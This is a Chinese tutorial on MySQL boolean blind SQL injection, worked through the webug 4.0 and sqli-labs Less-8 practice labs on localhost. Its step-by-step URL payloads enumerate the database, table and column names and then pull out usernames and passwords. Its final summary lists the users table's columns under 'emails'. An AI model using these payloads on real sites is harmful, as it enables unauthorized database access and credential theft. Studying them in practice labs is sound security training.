MySQL—布尔盲注

Mysql盲注

like 'ro%' 			  		   #判断 ro 或 ro...是否成立
regexp '^admin[a-z]' 		   #匹配admin及admin...等
if(条件,5,0) 	         		 #条件成立返回5，反之返回0
sleep(5) #SQL 		  		   #语句延时执行5秒
mid(a,b,c)   		  		   #从位置b开始，截取a字符串的c位
substr(a,b,c) 		  		   #从b位置开始，截取字符串a的c长度
left(database(),1)，database() #left(a,b)从左侧截取a的前b位
length(database())=8 		   #判断数据库database()名的长度
ord=ascii ascii(x)=97   	   #判断x的ascii码是否等于 97

语句可组合使用

1、布尔盲注

练习靶场：webug 4.0—布尔注入

1.1、测试注入点

id=2' and 1=1%23

id=2' and 1=2%23

%23=#

1.2、order by

id=2' order by 2%23

1.3、爆回显

union select 1,2%23

1.4、判断数据库长度

id=2' and length(database())=5%23

1.5、判断数据库名

and ascii(substr(database(),1,1))=119%23或者and substr(database(),1,1)='w'%23

and ascii(substr(database(),2,1))=101%23

…

数据库：webug

1.6、判断表名

首先该数据库下判断表的数量

and (select count(*) from information_schema.tables where table_schema=database())=7%23

回显正确，判断有7个表

判断表的长度

and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=9%23

这个语句是：如果数据库下第一条数据的第一行（第一张表）的长度为9，则回显正确

判断表名

and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=101%23

此语句：截取数据库下第二张表的名称的第一个字符的ASCII码是101

…

1.7、判断列

判断这个表里面有几个字段（有几列）

and (select count(column_name) from information_schema.columns where table_name='env_list')>1%23

and (select count(*) from information_schema.columns where table_name='env_list')>1%23

8列（图中标错了）

判断列的长度

and (select length(column_name) from information_schema.columns where table_name='env_list' limit 5,1)=7%23

判断列名

and ascii(substr((select column_name from information_schema.columns where table_name='env_list' limit 5,1),1,1))>1%23

这个语句是：截取env_list表下第6列的名称的第一个字符的ASCII码

1.8、查数据

判断该列有几个数据

and (select count(envFlag) from env_list)>1%23

判断数据长度

and (select length(envFlag) from env_list limit 1,1)>1%23

取该列下第二条数据长度

取值

and ascii(substr((select envFlag from env_list limit 1,1),1,1))>1%23

1.9、总结

布尔判断就是条件判断，若条件满足，则页面正确回显

1.10、sqlilabs—8练习

(1)、判断注入点

http://127.0.0.1/sqlilabs/Less-8/?id=1' and 1=1%23

(2)、爆字段

http://127.0.0.1/sqlilabs/Less-8/?id=1' order by 3%23

(3)、判断数据库

联合查询无果后尝试盲注

判断数据库名长度

http://127.0.0.1/sqlilabs/Less-8/?id=1' and length(database())=8 %23

判断数据库名称

http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr(database(),1,1)='s' %23

http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr(database(),2,1)='e' %23

······

数据库名：security

(4)、判断表

有几个表

http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select count(*) from information_schema.tables where table_schema='security')=4 %23

分别判断表长度

http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select length(table_name) from information_schema.tables where table_schema = 'security' limit 0,1)=6 %23

http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select length(table_name) from information_schema.tables where table_schema = 'security' limit 1,1)=8 %23

http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select length(table_name) from information_schema.tables where table_schema = 'security' limit 2,1)=7 %23

http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select length(table_name) from information_schema.tables where table_schema = 'security' limit 3,1)=5 %23

数据库：security
表1：长度为6
表2：长度为8
表3：长度为7
表4：长度为5

分别判断表名称

http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema = 'security' limit 0,1),1,1)='e' %23

http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema = 'security' limit 0,1),2,1)='m' %23

······

数据库：security
	表1：emails
	表2：referers
	表3：uagents
	表4：users

可以使用burp跑一下，对比长度判断回显

(5)、判断列

判断可得用户数据可能存放在users表中

判断表中有几个字段（有几列）

http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select count(column_name) from information_schema.columns where table_schema='security' and table_name = 'users')=3 %23

······

判断列长度

http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select length(column_name) from information_schema.columns where table_schema='security' and table_name = 'users' limit 0,1)=2 %23

判断列名

http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_schema='security' and table_name = 'users' limit 0,1),1,1)='i' %23

http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_schema='security' and table_name = 'users' limit 0,1),2,1)='d' %23

······

数据库：security
	表1：emails,3列
		id
		username
		password
	表2：referers
	表3：uagents
	表4：users

(6)、读取数据

判断几个数据

http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select count(username) from users)=13 %23

判断数据长度

http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select length(username) from users limit 0,1)=4 %23

······

跑burp得

数据库：security
	表1：emails,3列
		id
		username
		长4
		长8
		长5
		长6
		长6
		长8
		长6
		长5
		长6
		长6
		长6
		长7
		长6
		password

读数据

and ascii(substr((select username from users limit 0,1),1,1))=68%23

一次跑burp得出数据

密码同理